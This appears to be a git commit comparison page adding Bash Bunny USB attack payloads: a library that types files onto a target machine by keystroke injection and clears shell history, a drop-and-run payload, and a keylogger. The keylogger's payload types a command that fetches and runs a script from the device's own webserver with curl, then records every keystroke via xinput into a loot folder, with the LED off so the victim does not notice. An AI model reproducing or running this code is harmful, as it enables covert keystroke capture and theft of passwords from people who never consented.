Compare commits
14 Commits
c194ef166c
...
0ec8e1721c
Author | SHA1 | Date |
---|---|---|
Reda Couls | 0ec8e1721c | |
Peaks | 8d901a02a8 | |
Peaks | 14fa7c490e | |
Peaks | 2559d728b1 | |
TheDragonkeeper | 963c000ab9 | |
bg-wa | a479964196 | |
bg-wa | 17e0b3d50c | |
bg-wa | 5f06649cd2 | |
bg-wa | 9ab8820cc5 | |
bg-wa | b3b9f75200 | |
bg-wa | 5c764849f3 | |
bg-wa | afdafb27d6 | |
bg-wa | 821105a6a3 | |
bg-wa | 31ae33e78a |
|
@ -0,0 +1,103 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# DROP v1 by bg-wa
|
||||
# Simplifies dropping files from HID attacks for LINUX
|
||||
# Usage: DROP [OS] bb_source_file.txt attack_destination_file.txt [overwrite: false] [executable: false]
|
||||
#
|
||||
# Example:
|
||||
# DROP UNITY /root/udisk/payloads/$SWITCH_POSITION/source.sh ~/target_destination.sh true true
|
||||
source ./run.sh
|
||||
|
||||
function DROP() {
|
||||
os=$1
|
||||
source=$2
|
||||
destination=$3
|
||||
overwrite=$4
|
||||
executable=$5
|
||||
|
||||
case "$os" in
|
||||
WIN)
|
||||
RUN WIN powershell
|
||||
;;
|
||||
OSX)
|
||||
RUN OSX terminal
|
||||
;;
|
||||
UNITY)
|
||||
RUN UNITY terminal
|
||||
;;
|
||||
LINUX)
|
||||
RUN LINUX terminal
|
||||
;;
|
||||
*)
|
||||
RUN UNITY terminal
|
||||
;;
|
||||
esac
|
||||
|
||||
QUACK DELAY 1000
|
||||
|
||||
if "$overwrite" == "true"
|
||||
then
|
||||
case "$os" in
|
||||
WIN)
|
||||
QUACK STRING del "$destination"
|
||||
;;
|
||||
*)
|
||||
QUACK STRING rm "$destination"
|
||||
;;
|
||||
esac
|
||||
QUACK ENTER
|
||||
QUACK DELAY 500
|
||||
fi
|
||||
|
||||
case "$os" in
|
||||
WIN)
|
||||
QUACK STRING fsutil file createnew "$destination"
|
||||
QUACK ENTER
|
||||
QUACK DELAY 500
|
||||
QUACK STRING notepad.exe "$destination"
|
||||
QUACK ENTER
|
||||
QUACK DELAY 1000
|
||||
;;
|
||||
*)
|
||||
QUACK STRING vi "$destination"
|
||||
QUACK ENTER
|
||||
QUACK DELAY 500
|
||||
QUACK STRING i
|
||||
;;
|
||||
esac
|
||||
|
||||
while IFS= read -r data
|
||||
do
|
||||
QUACK STRING "$data"
|
||||
QUACK ENTER
|
||||
done < "$source"
|
||||
|
||||
QUACK DELAY 500
|
||||
|
||||
case "$os" in
|
||||
WIN)
|
||||
QUACK CTRL s
|
||||
QUACK CRTL x
|
||||
;;
|
||||
*)
|
||||
QUACK ESC
|
||||
QUACK ENTER
|
||||
QUACK STRING :wq
|
||||
QUACK ENTER
|
||||
|
||||
if "$executable" == "true"
|
||||
then
|
||||
QUACK STRING chmod +x "$destination"
|
||||
QUACK ENTER
|
||||
QUACK DELAY 500
|
||||
fi
|
||||
|
||||
QUACK STRING history -c
|
||||
QUACK ENTER
|
||||
QUACK STRING exit
|
||||
QUACK ENTER
|
||||
;;
|
||||
esac
|
||||
}
|
||||
|
||||
export -f DROP
|
|
@ -0,0 +1,126 @@
|
|||
#!/bin/bash
|
||||
|
||||
################################################################################
|
||||
# Quickly get to a prompt on any platform with the BashBunny
|
||||
#
|
||||
# How this works?
|
||||
# 1) Once the library is included in your payload, launch terminal\powershell\run
|
||||
# with:
|
||||
# PROMPT [OS]
|
||||
# 2) OS options are:
|
||||
# "AUTO" : Default - Hak5 2124 cross platform code
|
||||
# "UNITY" : Launches Terminal in Unity
|
||||
# "UNITY_RUN" : Opens run prompt in Unity
|
||||
# "MAC" : Launches Terminal in OSX
|
||||
# "POWERSHELL" : Launches Powershell in Windows
|
||||
# "WINDOWS_RUN": Opens run prompt in Windows
|
||||
# 3) To close a prompt use:
|
||||
# CLOSE_PROMPT [OS]
|
||||
################################################################################
|
||||
|
||||
################################################################################
|
||||
# Start HID Prompt
|
||||
################################################################################
|
||||
|
||||
|
||||
function PROMPT() {
|
||||
if [ -z "$1" ]; then
|
||||
OS="AUTO"
|
||||
else
|
||||
OS=$1
|
||||
fi
|
||||
|
||||
#AUTO
|
||||
if [ "${OS}" = "AUTO" ]; then
|
||||
LED G B 100
|
||||
QUACK ALT F2
|
||||
QUACK DELAY 50
|
||||
QUACK GUI SPACE
|
||||
QUACK DELAY 50
|
||||
QUACK GUI r
|
||||
clear_active_input
|
||||
wait_enter_wait 200 1000
|
||||
fi
|
||||
|
||||
#UNITY
|
||||
if [ "${OS}" = "UNITY" ]; then
|
||||
LED R B 100
|
||||
QUACK GUI
|
||||
clear_active_input
|
||||
QUACK STRING terminal
|
||||
wait_enter_wait 200 1000
|
||||
fi
|
||||
|
||||
#UNITY_RUN
|
||||
if [ "${OS}" = "UNITY_RUN" ]; then
|
||||
LED R B 100
|
||||
QUACK ALT F2
|
||||
fi
|
||||
|
||||
#MAC
|
||||
if [ "${OS}" = "MAC" ]; then
|
||||
LED R B G 100
|
||||
QUACK GUI SPACE
|
||||
clear_active_input
|
||||
QUACK STRING terminal
|
||||
wait_enter_wait 200 1000
|
||||
fi
|
||||
|
||||
#POWERSHELL
|
||||
if [ "${OS}" = "POWERSHELL" ]; then
|
||||
LED B 100
|
||||
QUACK GUI
|
||||
QUACK DELAY 500
|
||||
QUACK powershell
|
||||
wait_enter_wait 200 1000
|
||||
fi
|
||||
|
||||
#WINDOWS_RUN
|
||||
if [ "${OS}" = "WINDOWS_RUN" ]; then
|
||||
LED B 100
|
||||
QUACK GUI r
|
||||
QUACK DELAY 500
|
||||
fi
|
||||
|
||||
LED 0
|
||||
|
||||
}
|
||||
|
||||
function CLOSE_PROMPT() {
|
||||
if [ -z "$1" ]; then
|
||||
QUACK ALT F4
|
||||
else
|
||||
if [ "$1" = "MAC" ]; then
|
||||
QUACK GUI w
|
||||
else
|
||||
QUACK ALT F4
|
||||
fi
|
||||
fi
|
||||
}
|
||||
|
||||
# HELPER FUNCTIONS
|
||||
function wait_enter_wait() {
|
||||
if [ -z "$1" ]; then
|
||||
BEFORE_WAIT=100
|
||||
else
|
||||
BEFORE_WAIT=$1
|
||||
fi
|
||||
if [ -z "$2" ]; then
|
||||
AFTER_WAIT=100
|
||||
else
|
||||
AFTER_WAIT=$2
|
||||
fi
|
||||
|
||||
QUACK DELAY ${BEFORE_WAIT}
|
||||
QUACK ENTER
|
||||
QUACK DELAY ${AFTER_WAIT}
|
||||
}
|
||||
|
||||
function clear_active_input() {
|
||||
QUACK DELAY 50
|
||||
QUACK BACKSPACE
|
||||
QUACK DELAY 100
|
||||
}
|
||||
|
||||
export -f PROMPT
|
||||
export -f CLOSE_PROMPT
|
|
@ -0,0 +1,7 @@
|
|||
#!/bin/bash
|
||||
|
||||
# Wake up and do something productive here instead...
|
||||
sleep 10
|
||||
|
||||
# boom!!
|
||||
firefox "http://hak5.org"
|
|
@ -0,0 +1,30 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# Title: The Ol'Drop'n'Run
|
||||
# Author: bg-wa
|
||||
# Version: 1.0
|
||||
# Category: HID
|
||||
# Target: UNITY
|
||||
# Attackmodes: HID
|
||||
#
|
||||
# Quick HID only attack to write a file to target machine and open
|
||||
#
|
||||
# | Attack Stage | Description |
|
||||
# | ------------------- | ---------------------------------------- |
|
||||
# | SETUP | Open vi |
|
||||
# | ATTACK | Writing files |
|
||||
# | FINISH | Payload Dropped & ran (remove the bunny) |
|
||||
#
|
||||
|
||||
ATTACKMODE HID
|
||||
LED SETUP
|
||||
|
||||
source_script=/root/udisk/payloads/$SWITCH_POSITION/fuse.sh
|
||||
target_script=\~/fuse.sh
|
||||
|
||||
LED ATTACK
|
||||
|
||||
DROP $source_script $target_script true true
|
||||
RUN UNITY $target_script
|
||||
|
||||
LED FINISH
|
|
@ -0,0 +1,20 @@
|
|||
#/bin/bash
|
||||
checkonbunny() {
|
||||
mybunny=$(lsblk -p -S -o NAME,SERIAL | grep $BunnyID | awk '{print $1}')
|
||||
mybunny=$(findmnt $mybunny | grep $mybunny | awk '{print $1}')
|
||||
if [ -d $mybunny ]; then
|
||||
bashbunnyloot=$mybunny"/loot"
|
||||
mapfile=$bashbunnyloot"/maps"
|
||||
keyfile=$bashbunnyloot"/keys"
|
||||
startwork
|
||||
fi
|
||||
}
|
||||
startwork(){
|
||||
getdevicetouse=${getdevicetouse#"id="}
|
||||
xinput --test $getdevicetouse > $keyfile &
|
||||
xmodmap -pke > $mapfile
|
||||
}
|
||||
BunnyID="ch000001"
|
||||
bashbunnyloot=''
|
||||
getdevicetouse=$(xinput |grep keyboard | sed 's/slave keyboard//g' | while IFS= read -r line ;do [[ $line != *"Virtual"* ]] && [[ $line == *"keyboard"* ]] && echo $line | awk '{ for (i=1; i<=NF; ++i) { if ($i ~ "id=") print $i} }'; done)
|
||||
[[ -z $getdevicetouse ]] || checkonbunny
|
|
@ -0,0 +1,28 @@
|
|||
# Keylogger For Bash Bunny
|
||||
|
||||
Author: TheDragonkeeper
|
||||
|
||||
Version: Version 1
|
||||
|
||||
## Description
|
||||
|
||||
Dirty keylogger. Runs a webserver to pull code from for multiOS targeting
|
||||
|
||||
Captures all keyboard input without the need for root access
|
||||
Uses the user keyboard map file for decoding the captured data
|
||||
|
||||
## STATUS
|
||||
|
||||
| LED | Status |
|
||||
| ---------------- | ----------------------------------------------------------------------------- |
|
||||
| Blue flash | Booting |
|
||||
| Red slow | Waiting on webserver |
|
||||
| Blue Fast | Identifying Target and deploying accordingly |
|
||||
| LED OFF | Capturing data, no led for victim to spot, waiting for switch position change |
|
||||
| LED Red Fast | Decoding keys, Then doing any cleanup required |
|
||||
| Green flashing | Task complete, ready to unplug |
|
||||
|
||||
Still WIP, Currently supports linux (tested on ubuntu)
|
||||
If you want to add payloads for OSX or Windows place them into the switch folder then,
|
||||
Change TARGET_OS= to 'auto' and add the payloads to lines 15,16 as well as the clean up to lines 40,41 in payload.txt
|
||||
|
|
@ -0,0 +1,43 @@
|
|||
TARGET_OS='LINUX'
|
||||
|
||||
LED B 100
|
||||
ATTACKMODE HID STORAGE ECM_ETHERNET
|
||||
sleep 3
|
||||
LED R SLOW
|
||||
GET HOST_IP
|
||||
GET SWITCH_POSITION
|
||||
udisk mount
|
||||
cd /root/udisk/payloads/$SWITCH_POSITION/
|
||||
python webserver.py &
|
||||
while true; do [[ $(curl $HOST_IP:8080/index.html) ]] && break ; done
|
||||
LED B FAST
|
||||
[[ $TARGET_OS == 'auto' ]] && GET TARGET_OS
|
||||
[[ $TARGET_OS == 'WINDOWS' ]] && RUN WIN add windows payload
|
||||
[[ $TARGET_OS == 'MACOS' ]] && RUN OSX add osx payload
|
||||
[[ $TARGET_OS == 'LINUX' ]] && RUN LINUX bash \-c \'bash \<\(curl http\:\/\/$HOST_IP\:8080\/Linux\.sh\)\' \&
|
||||
LED
|
||||
WAIT
|
||||
LED R 0
|
||||
cd /root/udisk/loot
|
||||
keystate=''
|
||||
_ctrl='0'
|
||||
_alt='0'
|
||||
_shift='0'
|
||||
for line in $(cat 'keys')
|
||||
do
|
||||
if [ $line != 'key' ]; then
|
||||
if [ $line == 'press' ] || [ $line == 'release' ]; then
|
||||
keystate=$line
|
||||
else
|
||||
_spaces=$(printf '%*s' $((4-${#line})) | tr ' ' ' ')
|
||||
searchparams='keycode'"$_spaces"$line
|
||||
key=$(cat 'maps' | grep "$searchparams" | awk '{print $4}')
|
||||
echo "Ctrl="$_ctrl" Alt="$_alt" Shift="$_shift" "$keystate" "$key >> 'decoded'
|
||||
|
||||
fi
|
||||
fi
|
||||
done
|
||||
[[ $TARGET_OS == 'WINDOWS' ]] && RUN WIN add windows payload
|
||||
[[ $TARGET_OS == 'MACOS' ]] && RUN OSX add osx payload
|
||||
[[ $TARGET_OS == 'LINUX' ]] && RUN LINUX killall xinput
|
||||
LED G 0
|
|
@ -0,0 +1,28 @@
|
|||
#!/usr/bin/python
|
||||
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
|
||||
from os import curdir, sep
|
||||
PORT_NUMBER = 8080
|
||||
class myHandler(BaseHTTPRequestHandler):
|
||||
def do_GET(self):
|
||||
if self.path=="/":
|
||||
self.path="/"
|
||||
try:
|
||||
sendReply = False
|
||||
if self.path.endswith(".sh"):
|
||||
mimetype='text/plain'
|
||||
sendReply = True
|
||||
if sendReply == True:
|
||||
f = open(curdir + sep + self.path)
|
||||
self.send_response(200)
|
||||
self.send_header('Content-type',mimetype)
|
||||
self.end_headers()
|
||||
self.wfile.write(f.read())
|
||||
f.close()
|
||||
return
|
||||
except IOError:
|
||||
self.send_error(404,'File Not Found: %s' % self.path)
|
||||
try:
|
||||
server = HTTPServer(('0.0.0.0', PORT_NUMBER), myHandler)
|
||||
server.serve_forever()
|
||||
except KeyboardInterrupt:
|
||||
server.socket.close()
|
Loading…
Reference in New Issue